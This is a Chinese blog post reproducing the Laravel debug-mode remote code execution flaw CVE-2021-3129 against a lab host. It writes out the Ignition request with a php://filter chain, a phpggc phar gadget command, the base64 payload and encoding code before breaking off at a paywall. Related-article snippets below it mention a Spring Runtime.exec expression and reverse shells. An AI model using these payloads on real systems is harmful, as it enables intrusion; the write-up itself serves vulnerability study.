漏洞复现--laravel<=8.4.2 Debug RCE

最新推荐文章于 2025-03-12 08:02:12 发布
最新推荐文章于 2025-03-12 08:02:12 发布
阅读量419 收藏
点赞数
分类专栏: 漏洞复现 代码审计 文章标签: laravel 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Nginxx/article/details/121756587
版权
本文介绍了2021年Laravel存在的远程代码执行漏洞(CVE-2021-3129),详细阐述了漏洞复现过程,包括清空log、生成phar文件、quoted-printable-encode、写入log等步骤,并分析了漏洞的触发条件和payload的构建技巧,提醒读者避免非法利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本团队无关。

前言

2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

影响范围

laravel <= 8.4.2
Ignition <= 2.5.1
开启debug

CVE编号

CVE-2021-3129

复现步骤

清空 log

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.136.167:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.136.167:8000/_ignition/execute-solution
Content-Type: application/json
Content-Length: 320
Connection: close
Upgrade-Insecure-Requests: 1

{
	"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
	"parameters":{
		"variableName": "username",
		"viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/laravel/storage/logs/laravel.log"
	}
}

生成phar文件并base64

php -d'phar.readonly=0' ./phpggc monolog/rce1 call_user_func phpinfo --phar phar -o php://output | base64 -w0

PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrZAgAAAgAAABEAAAABAAAAAACCAgAATzozMjoiTW9ub2xvZ1xIYW5kbGVyXFN5c2xvZ1VkcEhhbmRsZXIiOjE6e3M6OToiACoAc29ja2V0IjtPOjI5OiJNb25vbG9nXEhhbmRsZXJcQnVmZmVySGFuZGxlciI6Nzp7czoxMDoiACoAaGFuZGxlciI7TzoyOToiTW9ub2xvZ1xIYW5kbGVyXEJ1ZmZlckhhbmRsZXIiOjc6e3M6MTA6IgAqAGhhbmRsZXIiO047czoxMzoiACoAYnVmZmVyU2l6ZSI7aTotMTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czo3OiJwaHBpbmZvIjtzOjU6ImxldmVsIjtOO319czo4OiIAKgBsZXZlbCI7TjtzOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6MTQ6IgAqAGJ1ZmZlckxpbWl0IjtpOi0xO3M6MTM6IgAqAHByb2Nlc3NvcnMiO2E6Mjp7aTowO3M6NzoiY3VycmVudCI7aToxO3M6MTQ6ImNhbGxfdXNlcl9mdW5jIjt9fXM6MTM6IgAqAGJ1ZmZlclNpemUiO2k6LTE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO2E6Mjp7aTowO3M6NzoicGhwaW5mbyI7czo1OiJsZXZlbCI7Tjt9fXM6ODoiACoAbGV2ZWwiO047czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjE0OiIAKgBidWZmZXJMaW1pdCI7aTotMTtzOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjc6ImN1cnJlbnQiO2k6MTtzOjE0OiJjYWxsX3VzZXJfZnVuYyI7fX19BQAAAGR1bW15BAAAANNQBGAEAAAADH5/2LQBAAAAAAAACAAAAHRlc3QudHh0BAAAANNQBGAEAAAADH5/2LQBAAAAAAAAdGVzdHRlc3R5dqEGHXRSkD3PRm3X6/hNNh1MXQIAAABHQk1C

quoted-printable-encode

Python 3.8.5 (default, Jul 28 2020, 12:59:40) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> a = 'PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrZAgAAAgAAABEAAAABAAAAAACCAgAATzozMjoiTW9ub2xvZ1xIYW5kbGVyXFN5c2xvZ1VkcEhhbmRsZXIiOjE6e3M6OToiACoAc29ja2V0IjtPOjI5OiJNb25vbG9nXEhhbmRsZXJcQnVmZmVySGFuZGxlciI6Nzp7czoxMDoiACoAaGFuZGxlciI7TzoyOToiTW9ub2xvZ1xIYW5kbGVyXEJ1ZmZlckhhbmRsZXIiOjc6e3M6MTA6IgAqAGhhbmRsZXIiO047czoxMzoiACoAYnVmZmVyU2l6ZSI7aTotMTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czo3OiJwaHBpbmZvIjtzOjU6ImxldmVsIjtOO319czo4OiIAKgBsZXZlbCI7TjtzOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6MTQ6IgAqAGJ1ZmZlckxpbWl0IjtpOi0xO3M6MTM6IgAqAHByb2Nlc3NvcnMiO2E6Mjp7aTowO3M6NzoiY3VycmVudCI7aToxO3M6MTQ6ImNhbGxfdXNlcl9mdW5jIjt9fXM6MTM6IgAqAGJ1ZmZlclNpemUiO2k6LTE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO2E6Mjp7aTowO3M6NzoicGhwaW5mbyI7czo1OiJsZXZlbCI7Tjt9fXM6ODoiACoAbGV2ZWwiO047czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjE0OiIAKgBidWZmZXJMaW1pdCI7aTotMTtzOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjc6ImN1cnJlbnQiO2k6MTtzOjE0OiJjYWxsX3VzZXJfZnVuYyI7fX19BQAAAGR1bW15BAAAANNQBGAEAAAADH5/2LQBAAAAAAAACAAAAHRlc3QudHh0BAAAANNQBGAEAAAADH5/2LQBAAAAAAAAdGVzdHRlc3R5dqEGHXRSkD3PRm3X6/hNNh1MXQIAAABHQk1C'
>>> ''.join(["=" + hex(ord(i))[2:] + "=00" for i in a]).upper()
'=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=5A=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=43=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=
最低0.47元/天 解锁文章
laravel5.8 反序列化漏洞复现
Zero_Adam的博客
06-22 2904
1. 前言 依旧跟着feng师傅学吧, 还是再github上下载源码:laravel5.8。往composer.json的require里面加上"symfony/symfony": “4.*”,然后composer update。 如果提示 Allowed memory size of bytes exhausted,参考这篇文章:运行 composer update,提示 Allowed memory size of bytes exhausted 如果想我这里一样:就报个error。。(弄好之后没那个报
php debug模式漏洞,Laravel <= v8.4.2调试模式造成远程代码执行漏洞
weixin_36482113的博客
04-10 1244
2020年11月底, 在为我们的一个客户进行安全审计时, 我们发现了一个基于Laravel的网站. 虽然这个网站的安全状态很好, 但我们注意到它是在调试模式下运行的, 因此显示了大量的错误信息, 包括堆栈痕迹: 经过进一步的检查, 我们发现这些堆栈痕迹是由Ignition生成的, 而Ignition是Laravel第6版开始的默认错误页面生成器. 在穷尽了其他漏洞载体之后, 我们开始对这个包进行更...
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 3786
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
Laravel 框架惊现高危漏洞,攻击者可肆意植入恶意脚本
最新发布
分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……
03-12 723
Laravel 框架中出现了一个极为严重的安全漏洞(编号为 CVE-2024-13918)。攻击者能够借此在运行该流行 PHP 框架特定版本的网站上,随意执行 JavaScript 代码。这个漏洞是在 Laravel 调试模式下的错误页面渲染环节被发现的。当应用程序处于开发配置状态时,就容易受到反射性跨站点脚本(XSS)攻击。CVSS v3.1 评分为 8.0 分,受影响的 Laravel 版本为 11.9.0 至 11.35.1。
Laravel RCE(CVE-2021-3129)漏洞复现
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
07-13 3724
Laravel框架简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Flu
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 6543
Laravel 远程代码执行漏洞(CVE-2021-3129)
漏洞复现| Laravel Debug mode RCE(CVE-2021-3129)
qq_42570883的博客
02-05 5333
漏洞名称】 Laravel Debug mode RCE(CVE-2021-3129) 【漏洞详情】 近日,国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。漏洞细节已在互联网公开。 【漏洞编号】 CVE-2021-3129 【验证工具】 https://
CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞复现
m0_56642842的博客
07-13 927
0x00 简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework),旨在实现的Web软件的MVC架构,它可以让开发者从面条一样杂乱的代码中解脱出来,帮助构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样开发者就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。E
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 542
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
黑白的博客
05-02 1665
声明 好好学习,天天向上 漏洞描述 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 影响范围 Laravel <= 8.4.2 Ignition <2.5.2 复现过程 这里使用
Laravel Debug mode RCE(CVE-2021-3129)漏洞利用
z.mumu的博客
12-07 1624
访问Laravel 访问/_ignition/execute-solution 抓包 会出现如下页面 2. 检测 修改为POST,添加内容 并且修改 Content-Type: application/json { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
Laravel5 开启Debug
weixin_30824277的博客
08-31 894
Laravel默认没有开启Debug,打开需要两步: .env文件中设置APP_DEBUG=true; 把Laravel服务重启一下(摸索出来的)。 这只是开启了基本的调试模式,如果需要看更详细的调试信息,就要借助扩展包了。 转载于:https://www.cnblogs.com/songziqing/p/5825372.html...
Laravel命令执行漏洞
longwanlian的博客
12-12 2624
Laravel基于php搭建的开发框架。
laravel5.3使用debug
keial的博客
05-03 1754
原文:https://laravel-news.com/laravel-debugbar 在laravel的project 内 composer require barryvdh/laravel-debugbar 安装好后 在./config/app.php中的providers数组中添加 'Barryvdh\Debugbar\ServiceProvider',然后在
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
cc123489ll的博客
06-29 1117
中间件及框架列表:等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask4、开发框架-Javascript-Node.js-JQuery常见语言开发框架:PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend 等JAVA:Spring MyBatis Hibernate Struts2 Springboot 等。
laravel的测试工具debug安装
wgchen
07-14 1065
Laravel 开发者工具类 - Laravel-debugbar简介1 安装 Debugbar2 生成配置文件,存放位置 `config/debugbar.php:`3 打开 `config/debugbar.php`,将 enabled 的值设置为: 简介 为了能更直观地看到问题,我们先安装 Laravel 开发者工具类 - laravel-debugbar。 1 安装 Debugbar composer require barryvdh/laravel-debugbar --dev 2 生成配置文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值